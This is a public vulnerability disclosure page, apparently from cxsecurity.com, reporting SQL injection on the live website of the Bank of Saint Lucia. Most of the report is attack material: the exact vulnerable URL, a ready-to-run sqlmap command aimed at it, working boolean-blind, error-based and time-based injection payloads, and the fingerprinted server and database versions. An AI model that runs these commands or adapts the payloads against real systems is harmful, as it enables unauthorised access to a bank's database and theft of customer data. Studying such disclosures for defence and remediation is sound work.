Bank of Saint Lucia - SQL Injection (Method GET)

2021.09.01
ng romulo lovesu (NG) ng
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Credits / Researcher > Romulo LovesU Product / Website > http://www.bankofsaintlucia.com/ Vulnerability Founded > SQL Injection using method GET Vulnerable Path > http://www.bankofsaintlucia.com/index.php?p=reply_post&id=10%27 MESSAGE ERROR > 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''10''' at line 1 Using sqlmap: sqlmap --random-agent --batch --level 2 --risk 2 --url "http://www.bankofsaintlucia.com/index.php?p=reply_post&id=10" --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: p=reply_post&id=10' AND 5384=(SELECT (CASE WHEN (5384=5384) THEN 5384 ELSE (SELECT 5365 UNION SELECT 7046) END))-- - Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: p=reply_post&id=10' AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(9601=9601,1))),0x7176626271),9601) AND 'shRJ'='shRJ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=reply_post&id=10' AND (SELECT 3952 FROM (SELECT(SLEEP(5)))vKSG) AND 'nQUm'='nQUm --- [XX:XX:XX] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 18.04 (bionic) web application technology: Apache 2.4.29, PHP back-end DBMS: MySQL >= 5.6 # This is has been reported by Romulo LovesU ;) # Thanx for reading! I see U later...


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top